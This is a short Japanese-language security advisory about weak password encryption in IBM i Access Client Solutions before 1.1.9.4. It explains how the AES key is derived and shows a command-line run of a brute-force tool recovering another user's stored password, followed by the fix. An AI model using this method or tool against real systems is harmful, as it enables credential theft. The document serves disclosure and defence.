
IBM i Access Client Solutions < 1.1.9.4 - 弱いパスワード暗号化
IBM i Access Client Solutions < 1.1.9.4 - 脆弱なパスワード暗号化
IBM i Access Client Solutionsはユーザーパスワードの保存にAESアルゴリズムを使用していますが、16バイトの暗号化キーは静的文字列(Thanatos)と、別の静的文字列(Behemoth)にユーザー名、ユーザーのホームフォルダ、OS(例:Linux)、およびアプリケーションが起動されたカレントディレクトリを組み合わせた文字列からのランダムな文字の組み合わせです。その結果、暗号化キーの半分は静的(文字列Thanatos)であり、残りの半分は非常に限定的です。これにより、攻撃者はシングルCPUコアでもパスワードを非常に簡単にブルートフォースできます。
以下は、mkubiakアカウントからas400_password_bruteforce_tool.javaスクリプトを使用してmmajchrowiczユーザーのパスワードを復号化した例です:
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt
IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team
Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47
Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19
Found good pass: Thanatosaun/Lcmo
Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74
Decrypted system password: Pentest
この問題は、脆弱なパスワード暗号化の適用によって引き起こされました。この問題はIBM i Access Client Solutions 1.1.9.4で修正されています。
< 1.1.9.4
IBM i Access Client Solutionsを1.1.9.4以降に更新してください。